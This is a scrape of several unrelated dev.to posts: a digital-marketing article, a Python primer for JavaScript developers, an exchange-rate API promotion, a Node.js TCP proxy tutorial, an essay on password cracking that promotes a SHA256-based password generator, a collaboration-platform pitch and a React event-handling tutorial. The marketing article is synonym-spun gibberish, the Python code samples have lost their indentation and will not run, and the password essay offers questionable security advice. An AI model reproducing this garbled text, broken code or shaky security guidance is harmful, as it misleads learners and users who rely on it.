Mastering Digital Marketing for Global Audiences
Whenever you've constructed a strong computerized establishment, the subsequent stage is to draw in and connect with clients. This requires a nuanced way to deal with computerized showcasing that considers neighborhood inclinations and stages. Key procedures include:
1. Website streamlining (Web optimization): Upgrading your webpage for nearby web search tools (Google, yet additionally stages like Baidu in China or Yandex in Russia) can emphatically expand your perceivability.
2. Content Showcasing: Making superior grade, locally important substance can assist with laying out your image as an expert in your industry and further develop your pursuit rankings.
3. Web-based Entertainment Promoting: Different social stages overwhelm in various business sectors. While Facebook and Instagram may be your go-to in the West, stages like WeChat in China or LINE in Japan may be more viable in Asian business sectors.
4. Powerhouse Associations: Working together with nearby powerhouses can assist you with rapidly assembling believability and arrive at in new business sectors.
5. Paid Advancing: Stages like Google Promotions and Facebook Ads offer complex zeroing in on decisions that grant you to show up at unequivocal economics in your objective business areas.
## Navigating Regulatory Challenges
Working in overall business areas brings an enormous gathering of regulatory hardships. From data assurance guidelines like GDPR in Europe to electronic business rules in countries like India, investigating this confusing scene requires mindful planning and regularly neighborhood capacity.
**Key locales to consider include:**
- Data confirmation and insurance guidelines
- Customer security rules
- Charge ideas, including Tank and customs commitments
- Safeguarded advancement honors
- Neighborhood business selection necessities
Various associations track down it vital to help out adjacent authentic subject matter experts or use stages like Avalara for charge consistence to ensure they're working inside the restrictions of neighborhood guidelines.
## Embracing Cross-Border E-commerce Platforms

For more modest organizations or those simply beginning their worldwide development, cross-line internet business stages can give an important passage point. Commercial centers like Amazon Worldwide, eBay Global, or Alibaba's Tmall Worldwide permit organizations to arrive at worldwide clients without the morning llneed to set up neighborhood substances or oversee complex coordinated operations.
These stages handle large numbers of the difficulties of global deals, including installments, delivering, and frequently even language interpretation. Notwithstanding, they likewise accompany expanded rivalry and stage expenses that can eat into edges.
## The Power of Personalization
In a worldwide commercial center, one size seldom fits all. Effective organizations utilize progressed personalization strategies to fit the shopping experience to individual inclinations. This could include:
- Suggesting items in view of perusing history
- Showing costs in neighborhood monetary forms
- Showing locally significant advancements or arrangements
- Adjusting the UI to neighborhood social standards
Simulated intelligence and AI advances are making it more straightforward than at any other time to convey exceptionally customized encounters at scale. Stages like Powerful Yield or Monetate can assist organizations with executing refined personalization techniques.
## Building Trust Across Borders
Trust is the cash of online business, and building it across social and etymological boundaries can challenge. Procedures to upgrade trust include:
- Showing security identifications and accreditations conspicuously
- Offering straightforward delivery and merchandise exchanges
- Giving brilliant client care in neighborhood dialects
- Exhibiting valid client audits and tributes
Devices like Trustpilot or Yotpo can help organizations gather and show client surveys, while chatbots controlled by simulated intelligence can give all day, every day client assistance in various dialects.
## The Mobile-First Imperative
In many developing business sectors, cell phones are the essential (and frequently just) method for getting to the web. This makes a versatile first methodology gainful, yet fundamental. This goes past having a responsive site to include:
- Portable advanced checkout processes
- Portable installment choices like Apple Pay or Google Pay
- Application advancement for key business sectors
- SMS advertising efforts
Organizations that neglect to focus on versatile gamble passing up a huge piece of the worldwide web based business market.
Leveraging Emerging Technologies
As we plan ahead, arising innovations are set to reshape the worldwide internet business scene. A few vital regions to watch include:
1. Expanded Reality (AR): Permitting clients to practically "take a stab at" items or envision them in their homes.
2. Voice Trade: As savvy speakers become more predominant, improving for voice search and empowering voice-based buys will be urgent.
3. Blockchain: For improving store network straightforwardness and empowering new installment strategies like digital currencies.
4. Web of Things (IoT): Making new touchpoints for trade through associated gadgets.
5. 5G Innovation: Empowering quicker, more solid associations that can uphold more extravagant, more intuitive online business encounters.
While these advancements are still in their beginning phases, ground breaking organizations are as of now investigating how they can be coordinated into their worldwide systems.
| alexgrace012 | |
1,917,766 | JavaScript to Python for Beginners | Why Learn Python? Python is one of the most popular programming languages in the world,... | 0 | 2024-07-09T20:01:45 | https://dev.to/epifania_garcia_8462512ef/javascript-to-python-for-beginners-1339 | javascript, python, beginners, programming | ## **Why Learn Python?**
Python is one of the most popular programming languages in the world, widely used in various fields such as web development, data analysis, artificial intelligence, scientific computing, and more. It is known for its readability and simplicity, making it an excellent choice for beginners and experienced developers alike. Python's extensive libraries and frameworks such as Django, Flask, Pandas, and TensorFlow, enable developers to build complex applications efficiently.
---
## **Essential Syntax: A Quick Overview**
**1. Data Types**
In Python, common data types include integers `int`, floating-point numbers `float`, strings `str`, lists, tuples, sets, and dictionaries.
```
# Integers and floats
x = 10
y = 3.14
# Strings
name = "John Doe"
# Lists
fruits = ["apple", "banana", "cherry"]
# Tuples
coordinates = (10.0, 20.0)
# Sets
numbers = {1, 2, 3, 4, 4}
# Dictionaries
person = {"name": "Luke", "age": 19}
```
**2. Variables**
Variables in Python are dynamically typed, meaning you don't need to declare their type explicitly.
```
# Variables
a = 5
b = "Hello, World!"
```
**3. Code Blocks**
Python uses indentation to define code blocks instead of curly braces `{}` like in JavaScript.
```
# Example of a code block
if a > 0:
print("a is positive")
else:
print("a is negative")
```
**4. Functions**
Defining functions in Python is straightforward with the `def` keyword.
```
# Function definition
def greet(name):
return f"Hello, {name}!"
# Function call
print(greet("Bo"))
```
**5. Conditionals**
Python uses `if`, `elif`, and `else` for conditional statements.
```
# Conditional statements
if x > 0:
print("x is positive")
elif x == 0:
print("x is zero")
else:
print("x is negative")
```
**6. Arrays and Objects**
In Python, lists and dictionaries are the closest equivalents to JavaScript's arrays and objects.
```
# Lists (arrays in JavaScript)
numbers = [1, 2, 3, 4, 5]
# Dictionaries (objects in JavaScript)
car = {
"brand": "Toyota",
"model": "Corolla",
"year": 2020
}
```
**7. Iteration**
Python provides various ways to iterate over sequences, including `for` loops and `while` loops.
```
# For loop
for fruit in fruits:
print(fruit)
# While loop
count = 0
while count < 5:
print(count)
count += 1
```
---
## **Differences and Similarities Between Python and JavaScript**
####Differences
**1. Syntax:** Python uses indentation for code blocks, whereas JavaScript uses curly braces.
**2. Data Structures:** Python has built-in support for lists, tuples, sets, and dictionaries, while JavaScript primarily uses arrays and objects.
**3. Functions:** Python functions are defined using `def`, where JavaScript uses the `function` keyword or arrow functions `=>`.
####Similarities
**1. Dynamic Typing:** Both languages are dynamically typed, allowing for flexible and concise code.
**2. Interpreted Languages:** Both are interpreted languages, making them suitable for scripting and rapid development.
**3. High-level Language:** Both languages are abstracted from low-level details, enabling developers to focus on solving problems.
---
## **Tips for Learning Python as a JavaScript Developer**
**1. Leverage Your JavaScript Knowledge:** Many programming concepts such as variables, loops, and conditionals are similar, so you can focus on Python’s specific syntax and conventions.
**2. Practice with Projects:** Build projects like a web scraper, a simple web app using Flask, or data analysis scripts to get hands-on experience.
**3. Use Interactive Python Environments:** Tools like Jupyter Notebook and IPython can be helpful for experimenting with Python code.
**4. Explore Python Libraries:** Familiarize yourself with popular Python libraries relevant to your interests, such as Django for web development or Pandas for data analysis.
---
## **Learning Resources**
[Official Python Documentation](https://docs.python.org/3/)
[Real Python Tutorials](https://realpython.com/)
[W3Schools Python Tutorials](https://www.w3schools.com/python/default.asp)
[Automate the Boring Stuff with Python](https://automatetheboringstuff.com/)
Learning Python can significantly broaden your programming skills and open up new opportunities in various fields of software engineering. With its simplicity and readability, you'll find that transitioning from JavaScript to Python can be a smooth and rewarding experience. Happy building and best of luck! | epifania_garcia_8462512ef |
1,917,767 | Integrating Exchange Rate APIs for Improved Financial Accuracy | Exchange rate APIs play a crucial role in ensuring financial transactions are conducted accurately... | 0 | 2024-07-09T20:08:56 | https://dev.to/sameeranthony/integrating-exchange-rate-apis-for-improved-financial-accuracy-3fe4 | api, exchange, rate, financial | Exchange rate APIs play a crucial role in ensuring financial transactions are conducted accurately and efficiently. Whether you are running a currency exchange company or managing international transactions, integrating a reliable **[exchange rate API](https://currencylayer.com/)** can significantly enhance the accuracy and timeliness of your financial operations.
## Understanding Exchange Rate APIs
Exchange rate APIs provide real-time or historical currency conversion rates across various currencies. These APIs fetch data from multiple sources and aggregate them into a standardized format such as JSON. This enables developers to seamlessly integrate currency conversion capabilities into their applications, websites, or financial systems.
## Benefits of Using Exchange Rate APIs
Real-Time Accuracy: By accessing real-time currency rates API, businesses can ensure that transactions reflect the most current exchange rates, minimizing the risk of financial discrepancies.
- Historical Data: Historical exchange rate APIs allow businesses to analyze past trends and perform accurate financial forecasting based on historical exchange rates.
- Cost-Effectiveness: Many free exchange rate APIs offer basic functionalities without incurring additional costs, making them accessible to startups and small businesses looking to manage currency conversions without a hefty investment.
- Global Coverage: Whether you operate in one country or across continents, currency APIs provide exchange rates for a wide range of currencies, supporting global business operations seamlessly.
## Choosing the Best Exchange Rate API
When selecting an exchange rate API, consider factors such as:
- Data Accuracy: Opt for APIs that source data from reliable financial institutions to ensure accurate and up-to-date information.
- Ease of Integration: Look for APIs with comprehensive documentation and support for multiple programming languages like JavaScript for easy integration into your existing systems.
- Scalability: Ensure the API can handle your anticipated transaction volumes and growth without compromising on performance or reliability.
## Implementing Exchange Rate APIs in Your Business
Integrating an exchange rate API involves:
- API Endpoint Integration: Utilize API endpoints provided by the service to fetch real-time or **[historical exchange rates API](https://currencylayer.com/exchange-rate)**.
- Data Parsing: Convert retrieved data, typically in JSON format, into a usable format within your application or financial system.
## Conclusion
Integrating exchange rate APIs into your business operations enhances financial accuracy, streamlines currency conversions, and supports informed decision-making. Whether you're a currency exchange service or managing international payments, leveraging the capabilities of real-time currency rates APIs empowers your business to thrive in the interconnected global marketplace. Choose the best currency API that aligns with your business needs and watch as it transforms the efficiency and reliability of your financial transactions. | sameeranthony |
1,917,768 | How I Build a Scratch Proxy Server Using Node.js | You might be curious about how proxy servers work and how they serve data over the internet. In this... | 0 | 2024-07-09T21:29:43 | https://dev.to/avinash_tare/how-i-build-a-scratch-proxy-server-using-nodejs-55d9 | node, proxy, javascript, core |
You might be curious about how proxy servers work and how they serve data over the internet. In this blog, I am going to implement a proxy server using core NodeJs.I achieved this using a core NodeJs package called `net` which already comes with NodeJs.
## How Proxy Works
a proxy server is an agent between the client and the server. When a
client sends a request to a server it is forwarded to a target proxy
server. The targeted proxy server processes the request and sends it
to the main server and the main server sends the back request to the
proxy server and the proxy server sends the request to the client.

## Set up Proxy Server
Before, starting programming you know little about `socket` and NodeJs.You know what a is socket and how they work.
In NodeJs There are two methods to implement a proxy server. First I custom method and second in-build. Both are easy to understand.
> To test your proxy server you can run your local HTTP serve on your local machine and then target the host machine.
* Now, I will define the `net` package and then write the target server and port number.
```js
const net = require('net');
// Define the target host and port
const targetHost = 'localhost'; // Specify the hostname of the target server. For Ex: (12.568.45.25)
const targetPort = 80; // Specify the port of the target server
```
* Creating and listening TCP server.
```js
const server = net.createServer((clientSocket) => {
});
// Start listening for incoming connections on the specified port
const proxyPort = 3000; // Specify the port for the proxy server
server.listen(proxyPort, () => {
console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
- we have created a server using the net package. it's a [TCP](https://www.geeksforgeeks.org/what-is-transmission-control-protocol-tcp/) server which is running port number `3000` as we define in using the `proxyPort` variable. if the server starts it will show the `Reverse proxy server is listening on port 3000` message on the console.
- when the client tries to connect the proxy server it runs the callback function which is inside `createServer`.
- In server function callback we have one parameter `clientSocket` it's the user connection that we received for the connection.
* accept and receive data from the user
```js
const targetHost = 'localhost'; // Specify the hostname of the target server. For Ex: (12.568.45.25)
const targetPort = 80; // Specify the port of the target server
// Create a TCP server
const server = net.createServer((clientSocket) => {
// Establish a connection to the target host
net.createConnection({host: targetHost, port: targetPort}, () => {
// When data is received from the client, write it to the target server
clientSocket.on("data", (data) => {
targetSocket.write(data);
});
// When data is received from the target server, write it back to the client
targetSocket.on("data", (data) => {
clientSocket.write(data);
});
});
});
```
* When a client tries to connect proxy server we will create a temporary connection to the server using create `createConnection`
* `createServer` have 2 arguments
- 1st Host where we want to connect in this case we have to connect to our server host which is defined in `targetHost` variable.
- 2nd Port where we want to connect in this case we have to connect to our server port which is defined in `targetPort` variable.
* Now, When user send data I will pass this data to server. using this code
```js
clientSocket.on("data", (data) => {
targetSocket.write(data);
});
```
* Then, the Server sends data I will send this data to the user, using this code
```js
targetSocket.on("data", (data) => {
clientSocket.write(data);
});
```
* Congratulations! you successfully created your proxy server.
## Error Handling
While exploring the functionality of the proxy server is exciting, ensuring reliability requires robust error-handling methods to handle unexpected issues gracefully. To handle those types of errors we have an `event` called an `error`. It's very easy to implement.
```js
const server = net.createServer((clientSocket) => {
// Establish a connection to the target host
const targetSocket = net.createConnection({host: targetHost,port: targetPort}, () => {
// Handle errors when connecting to the target server
targetSocket.on('error', (err) => {
console.error('Error connecting to target:', err);
clientSocket.end(); // close connection
});
// Handle errors related to the client socket
clientSocket.on('error', (err) => {
console.error('Client socket error:', err);
targetSocket.end(); // close connection
});
});
});
```
* when any error occurs we will console the error and then close the connection.
## ALL Code
* replace host name and port number according to your preference.
```js
const net = require('net');
// Define the target host and port
const targetHost = 'localhost'; // Specify the hostname of the target server
const targetPort = 80; // Specify the port of the target server
// Create a TCP server
const server = net.createServer((clientSocket) => {
// Establish a connection to the target host
const targetSocket = net.createConnection({
host: targetHost,
port: targetPort
}, () => {
// When data is received from the target server, write it back to the client
targetSocket.on("data", (data) => {
clientSocket.write(data);
});
// When data is received from the client, write it to the target server
clientSocket.on("data", (data) => {
targetSocket.write(data);
});
});
// Handle errors when connecting to the target server
targetSocket.on('error', (err) => {
console.error('Error connecting to target:', err);
clientSocket.end();
});
// Handle errors related to the client socket
clientSocket.on('error', (err) => {
console.error('Client socket error:', err);
targetSocket.end();
});
});
// Start listening for incoming connections on the specified port
const proxyPort = 3000; // Specify the port for the proxy server
server.listen(proxyPort, () => {
console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
# Built Method
To reduce client and server connection complexity we have built-in method `pipe`.I will replace this syntax
```js
// Handle errors when connecting to the target server
targetSocket.on("data", (data) => {
clientSocket.write(data);
});
// When data is received from the client, write it to the target server
clientSocket.on("data", (data) => {
targetSocket.write(data);
});
```
Into this syntax
```js
// Pipe data from the client to the target
clientSocket.pipe(targetSocket);
// When data is received from the client, write it to the target server
targetSocket.pipe(clientSocket);
```
## Here is all code
```js
const net = require('net');
// Define the target host and port
const targetHost = 'localhost';
const targetPort = 80;
// Create a TCP server
const server = net.createServer((clientSocket) => {
// Establish a connection to the target host
const targetSocket = net.createConnection({
host: targetHost,
port: targetPort
}, () => {
// Pipe data from the client to the target
clientSocket.pipe(targetSocket);
// Pipe data from the target to the client
targetSocket.pipe(clientSocket);
});
// Handle errors
targetSocket.on('error', (err) => {
console.error('Error connecting to target:', err);
clientSocket.end();
});
clientSocket.on('error', (err) => {
console.error('Client socket error:', err);
targetSocket.end();
});
});
// Start listening for incoming connections
const proxyPort = 3000;
server.listen(proxyPort, () => {
console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
## A Working Proxy Server!
{% embed https://www.loom.com/share/351e68997b084bf38aa132d8831436d3?sid=b1b6cac4-102e-46b3-81e5-b5e8120ad7b1 %}
Follow Me On GitHub [avinashtare](http://github.com/avinashtare/), Thanks.
| avinash_tare |
1,917,769 | 10 Billion Passwords Cracked: Do You Even Understand Password Cracking? Do You, Really? | Introduction If you understood how passwords were cracked, you'd never use a... | 0 | 2024-07-09T20:13:35 | https://dev.to/raddevus/10-billion-passwords-cracked-do-you-even-understand-password-cracking-do-you-really-37ho | ## Introduction
If you understood how passwords were cracked, you'd never use a natural-language word in your password again. And, that alone could make you entirely safe. Yes, I'll explain how that could make you safe further along in this article.
I'm taking a bit of an alternate view so we can think differently about what password cracks actually mean, and if passwords are just entirely unusable or not.
## Background
All of the Security Geniuses tell you that passwords are a failed technology because so many passwords are cracked. But, why don't they ever clearly explain how passwords are cracked?
There seems to be a Movement that is trying to get rid of passwords that you own.
## The Bombastic News
One of the problems is that the news covers low-brow technical issues in a bombastic way ("High-sounding but with little meaning".
Check out this article from today on LinkedIn.
[Nearly 10 billion passwords leaked | LinkedIn](https://www.linkedin.com/news/story/nearly-10-billion-passwords-leaked-6091644/)

10 Billion passwords!? What?
## Let's Rip That Article Apart Now, Shall We?
The article states:
> "...almost 10 billion unique passwords have been posted to a hacking forum"
That leads you to believe that 10 Billion plaintext passwords ripe for the using have been posted.
However, that cannot be true. Because if it were, then what would the other sentences in the article mean? Especially the last one:
> It could enable "brute-force attacks," which use trial and error to rapidly test a large number of passwords and gain access to systems that aren't protected.
Why would attackers need to do "brute-force attacks which use trial and error" when they have the passwords in the clear? Well, that's because they don't.
It is Alarmist reporting. I followed the links to the source article (on qz.com) and that article is even shorter and doesn't explain it at all. So, they did not post 10 Billion plaintext passwords at all.
But you already knew that Journalists do no work at all. They just make up sentences, then other "news" sites pick up the information and repeat it and it provides it with gravitas so the truth is no longer necessary. As long as you have shocking headlines, you win.
## The Thing They Never Explain
Often the news reports these kinds of numbers and they report bad passwords, right?
It is obvious that many of those accounts and passwords are just for fake accounts or "pass-by" accounts where users have created a quick account to discover more information about a company or get a free item or whatever.
## The Point: Fake Accounts With Bad Passwords
So, even though there are really bad passwords like (password1, abc123) what they don't explain to the reader is that there are millions of accounts created by pass-by users and others created by hackers and those users don't care about the password at all.
## Yes, Normal People Create Bad Passwords
Yes, I know, normal people create terrible passwords. However, there is a simple thing they can do to make their passwords safe: Never use a natural-language word in the password.
## The Solution
Instead, create a completely random set of characters as your password.
## The Problem
Normal users would have no way to remember a set of random characters.
Obviously, that can be solved by forcing the user to use a Password Manager which generates random passwords.
## The Weird Solution: Hamster Method
Here's a way to make a normal user's accounts almost entirely safe. Please chime in and comment below to argue why this might not be true.
Here are the steps:
1. Create one random password for the user's main email account by having a hamster run across the keyboard.
2. I just dropped my hamster on my keyboard and got : adgy788t6ops;ldfkyudt621@DCG32#@&
3. Use this one for her master password on her email account. That way her main email account is protected with a random strong password.
4. Write this down and keep in a sealed lock box -- at some point the user will have it memorized
5. After that, every time the user creates a new account she should drop the hamster on the keyboard again and generate a password, but for these accounts they do not need to be written down anywhere? What?
6. Each time the user goes to sign into any of the other accounts she will always simply say, "oh, I don't know my password, please reset the account" sent to her main email account.
7. She will retrieve the reset from the main email account and login
8. Now there is only one Main password to remember / use and the other ones will all just be reset every time. Isn't this GENIUS?!
My point is: If No One Knows Your Password (including you), It's Secure
## My Real Point Is : Random!
My real point is that passwords must be random so they cannot be guessed.
But, to better state that point, I'd like to say this:
Passwords ust not include any pattern that someone can detect as a pattern.
That's true random.
## How Crackers Crack Passwords
People seem to forget how crackers actually crack the passwords.
## Ignore PlainText Storage
Let's ignore the companies which are storing your password in plaintext, ok? Do they still exist? I hope not. If they do then you are toast. No getting around that. Crackers going to crack and they going to get a password trove that is in plaintext.
## Generate All The Hashes & Compare
The real way that crackers get passwords is:
Write an algorithm which hashes suspected passwords and password phrases to generate a huge database of hashes
Compare those hashes to what they find in the trove they exfilitrate from a company.
That's it!
## Think About The Size of SHA256 Hash
So, 256-bit value is the value of 2^256.
The max value is :
115,792,089,237,316,195,423,570,985,008,687,907,853,269,984,665,640,564,039,457,584,007,913,129,639,935
Let's refer to that number as HUGE-NUMBER.
## Reach In Bag, Pull One Random Item Out
Think about this experiment.
1. Reach into a bag (without looking) which contains HUGE-NUMBER of items and randomly pull one item out.
2. Throw the item back into the bag with the rest of HUGE-NUMBER items.
3. Reach in a second time (without looking) and attempt to randomly pull the same one out again. Theoretically impossible!
### Why does this matter?
This matters because any unique input will produce a new and unique output. At this point there are no collisions known in the SHA256 algorithm.
### Why does any of this matter?
It matters, because we are going to use a SHA256 hash as our password.
Why? Because the SHA256 value is random. It's the equivalent of having a hamster run over your keyboard and create a password.
## But How Are SHA256 Hashes Generated?
Well, we don't have to know how the dark details of the SHA256 algorithm work exactly, but we do need to know how to generate one.
We can use libraries which contain the SHA256 algorithm to generate SHA256 hashes.
Microsoft provides such a library and you can get to it via PowerShell
## PowerShell Script to Create SHA256 From Any Text
```
param (
[string]$target = $(Read-Host)
)
$stringAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($stringAsStream)
$writer.write($target)
$writer.Flush()
$stringAsStream.Position = 0
$outHash = Get-FileHash -InputStream $stringAsStream | Select-Object Hash
$outHash.hash.ToLower()
```
1. First we read in a string value provided by the user ($target) at the command line.
2. Next, we set up a StringStream and set the value to the user-supplied string ($target)
3. Next, we call Get-FileHash (generates SHA256) and pass the user-supplied string to it
4. Finally, we lowercase the hash just for consistency.
Here are some words that I've hashed for you. I ran this on my Ubuntu 22.04.4 system.

## 64 Characters Long
The hashes are 64 characters long, because each of the 32 bytes (256 bits / 8 bits = number of bytes = 32) are represented by a 2 char Hexadecimal value.
Get the source (at the top this article) and you can try it too.
Here's a list of random words and their SHA256 hashes.

## My Suggestion Is One I Use
My suggestion is that instead of making up a password again, you instead generate a SHA256 hash and use that as your password.
## Couldn't A Cracker Generate The Same Hash?
But, wait, can't someone just use the same words I used to generate a SHA256 hash and then compare their hash to mine and then know what my password is?
Well, not really. Here's why.
## Make Your Hash Salty
First of all you'd need to use two pieces of data in your hash so you could create very random hashes.
In order to make it more difficult (or theoretically impossible) for someone to get our original value, we need to add a 2nd value to our initial input. This 2nd value is called a salt.
## Salt: Additional Word Or Phrase
For example we could create an additional word or phrase that we would append to every input that we will hash.
Here's all of the previous words with their associated hashes after adding the same salt to each one.

See how different the hashes are now? They're not guessable by any means. If they were then SHA256 hash algorithm would be cracked.
## Keep That Salt Secret
But, you have to keep that salt secret. If it gets out then the cracker can generate all the words in the dictionary and hash them and then brute-force compare them all to the trove of SHA256 hashes that are in the 10 Billion password vault.
## What You Really Need Is A Program To Do This For You
I just so happen to have written such a program and it is FOSS (Fully Open Source Software) and it is FREE forever.
That means:
- You can try it for FREE
- You can use it for FREE
- You can examine and alter the software all you want...for FREE
- Try It For Free
- You can try it, right now in your browser if you want.
## Just go to C'YaPass : [Never type a password again](https://cyapass.com/js/cya.htm) and you'll see something like the following:

## SiteKeys: Add Your Own
Of course, you won't have any siteKeys, but you can add them.
There are two parts to generating your password.
1. The SiteKey - unique string you make up to remember which site you'll use this pwd on.
2. A pattern you draw which generates a value - this is the salt to randomize the SHA256 hash
Finally, the value in at the lower right of the screen is a 64 character password (SHA256 hash) you can use on the site.
## Your Passwords Aren't Stored Anywhere, They're Generated Every Time
This is cutting edge technology because your passwords are never stored anywhere.
To generate your password, you have to:
1. Select your SiteKey
2. Draw your pattern
## You Only Need One Pattern
Because the pattern is the salt, each time you change your sitekey (select a different one on the left side) you will get a new password for the associated site. So you don't have to change the pattern for every sitekey.
## Your Passwords Will Not Be Based On Natural-Language Words
This means your passwords will be random numbers and characters. They will not be in cracker's rainbow tables as targets to match.
## Sites Will Hash Your Hash
When you use these hashes as your password, the sites you log into will then hash it to save it on their site which is interesting too.
But, I've added another layer of protection.
## Multi-Hash: Hash Your Hash Numerous Times
Take a look at the updated C'YaPass and you'll see I've added the ability for you to hash the initial value X number of times (selectable by you). See the red highlighted section. If you change that value, then all of your hashes will be hashed X (10 in the example) extra times.

## Conclusion
1. If you wanted really strong passwords, you would never use natural-language words in your passwords. EVER!
2. It seems that Password Problems are being reported on improperly to gain attention and to scare people for some reason. Passwords are fine and you own them yourself. But, they should never include words from natural-language. NEVER!
3. The reported password breach of 10 Billion passwords is obviously reported improperly. Those are not plaintext passwords but instead are (most likely) hashes of passwords which, if they include natural-language words the crackers may be able to use after brute-forcing their algorithm to generate SHA256 hash matches. That's the real password cracking technology today: hash matching.
## Hash Matching
Since hash matching is the real way crackers are cracking passwords then it means you understand better what crackers are doing. Since you understand it better, you undersand you NEVER want to have natural-language words in your passwords.
To protect yourself, use a password generator which generates random passwords.
If you liked this article, check out my github sources for C'YaPass:
[Web based solution](https://github.com/raddevus/CYaPass-Web) - (also seen at https://cyapass.com/js/cya.htm)
[ElectronJS](https://github.com/raddevus/CYaPass-Electron) (cross-platform solution) - runs on macOs, Windows, Linux
And don't believe everything you read about passwords. 🤓 | raddevus | |
1,917,794 | From Solo Coder to Team Player: Why Two Heads are Better Than One (and Sometimes More Fun) | Alone we can do so little; together we can do so much. – Helen Keller The Power of... | 0 | 2024-07-09T20:21:55 | https://dev.to/socialcodeclub/from-solo-coder-to-team-player-why-two-heads-are-better-than-one-and-sometimes-more-fun-28hj | webdev, startup, coding, productivity |
> Alone we can do so little; together we can do so much. – Helen Keller
### The Power of Collaboration in Coding
If you've ever tried to debug a piece of code at 2 AM with a cup of cold coffee, you know this is true. As much as we might like to think of ourselves as coding ninjas, the reality is that coding is often a team sport. Here’s why teaming up with others can turn coding from a solo grind into a fun and productive adventure.
---
#### 1. Diverse Perspectives Lead to Better Solutions
Imagine you’re building a spaceship (because why not?). You might be great at the engines, but your friend knows how to make the control panel look like something straight out of Star Trek. Together, you create the coolest spaceship ever! Collaboration brings together different perspectives, making your projects more innovative and well-rounded.
#### 2. Learn and Grow Faster
Remember the time you spent three hours trying to figure out why your code wouldn’t run, only for a colleague to point out a missing semicolon? When you collaborate, you learn from each other’s mistakes and successes. It’s like having a cheat sheet that talks back and sometimes rolls its eyes at you.
#### 3. Get More Done, More Efficiently
Think of collaboration as a potluck dinner. Everyone brings something to the table, and before you know it, you’ve got a feast. When you split tasks with your team, you get more done in less time. Plus, someone else can bring dessert (or in this case, handle the tricky algorithms).
#### 4. Build a Supportive Community
Ever had a coding meltdown? You know, the kind where your computer screen starts looking like a blur of frustration? In a collaborative environment, you’ve got a support group ready to jump in and help out. They might not bring tissues, but they’ll definitely help debug that rogue function.
#### 5. Prepare for the Real World
In the professional world, coding is like a relay race. You need to pass the baton (or code) smoothly to the next person. By collaborating on projects now, you get a taste of what it’s like to work in a real tech team. You’ll develop essential soft skills like communication, teamwork, and managing not to strangle your co-workers when they refactor your code.
#### 6. Stay Accountable and Motivated
When you’re part of a team, you can’t just binge-watch an entire season of your favorite show instead of working (at least not without getting caught). Being accountable to others keeps you motivated. Plus, seeing your teammates’ progress can inspire you to put in your best effort – and maybe even finish your tasks before the deadline.
#### 7. Drive Innovation Together
Two heads are better than one, and a whole team of heads can create something truly extraordinary. Collaboration leads to collective brainstorming, and that’s where the real magic happens. The synergy of a team can push the boundaries of what’s possible.
---
### Join the [SocialCode](https://socialcode.club/) Community
At [SocialCode](https://socialcode.club/), we believe in the power of collaboration. Our platform connects developers, fostering a community where you can share knowledge, work on exciting projects, and grow together.
Say goodbye to solo coding and embrace the power of collaboration. Join us at [SocialCode](https://socialcode.club/) and be part of a vibrant, supportive community that’s shaping the future of technology — with a little less cold coffee and a lot more fun. | socialcodeclub |
1,917,795 | Intern level: Handling Events in React | Handling events in React is a crucial aspect of creating interactive web applications. This guide... | 0 | 2024-07-09T20:23:00 | https://dev.to/__zamora__/intern-level-handling-events-in-react-3b36 | react, webdev, javascript, programming | Handling events in React is a crucial aspect of creating interactive web applications. This guide will introduce you to the basics of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, you can add event handlers directly in your JSX. Event handlers are functions that are called when a particular event occurs, such as a button click or a form submission. React's event handling is similar to handling events in regular HTML, but with a few differences.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Conclusion
